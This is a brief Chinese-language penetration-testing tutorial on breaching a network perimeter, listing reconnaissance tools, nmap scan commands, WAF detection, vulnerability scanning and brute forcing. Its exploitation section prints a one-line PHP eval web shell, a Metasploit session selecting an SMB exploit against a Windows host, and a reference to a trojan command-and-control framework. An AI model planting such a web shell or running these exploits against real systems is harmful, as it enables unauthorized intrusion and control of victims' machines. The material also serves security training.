其他
干货 | 渗透测试核心思路-边界突破
概述
Step 1 信息收集
1.1 域名及子域名
https://github.com/shmilylty/OneForAll
1.2 主机、端口和协议
namp -sS -sU target_ip -p 100-27018
-sS 为TCP SYN扫描具有更强隐蔽性,不建立连接;
-sU 激活UDP扫描,检测端口上开启的UDP服务;
-p 指定扫描的端口范围,但会更加耗时;
sudo nmap -A --version-intensity 9 target_ip -p target_port
-A 同时打开操作系统探测和版本探测,其中操作系统探测需要sudo权限;
--version-intensity 确定版本扫描的强度;
target_port 是上述命令执行之后得到的开启的端口
1.3 端口服务及其上框架CMS或组件
Wappalyzer
去分析包括前端框架,后端框架、服务器类型、插件、编程语言等等版本信息。云悉
资产探测平台很好用,但是需要邀请码。这部分主要的内容不过是确定框架和组件,还有版本信息。有了版本信息就可以去找一些没有修复的漏洞攻进去。1.4 Waf识别
下载地址:https://github.com/EnableSecurity/wafw00f
https://github.com/maurosoria/dirsearch
Step 2 漏洞扫描
2.1 Xray
2.2 弱密码爆破
Step 3 漏洞利用
3.1 蚁剑
<?php eval(@$_POST['jfe']); ?>
2.3 Metasploit (MSF)
msf6 > search smb type:exploit platform:windows # 针对目标使用exp
msf6 > use 0 # 选择一个exp
msf6 > show options # 查看该exp的选项
msf6 > show payloads # 选择用于保持连接的payload
msf6 > set RHOST 10.10.10.10 # 设置一系列exp的选项
msf6 > exploit
木马客户端在目标机上的隐藏 指令在目标机上运行以及执行结果回显 木马客户端和服务器端的通信
项目地址:https://github.com/FunnyWolf/Viper